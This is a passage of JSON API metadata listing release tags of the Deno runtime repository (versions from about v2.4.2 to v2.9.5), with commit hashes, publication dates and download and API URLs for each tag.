Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:5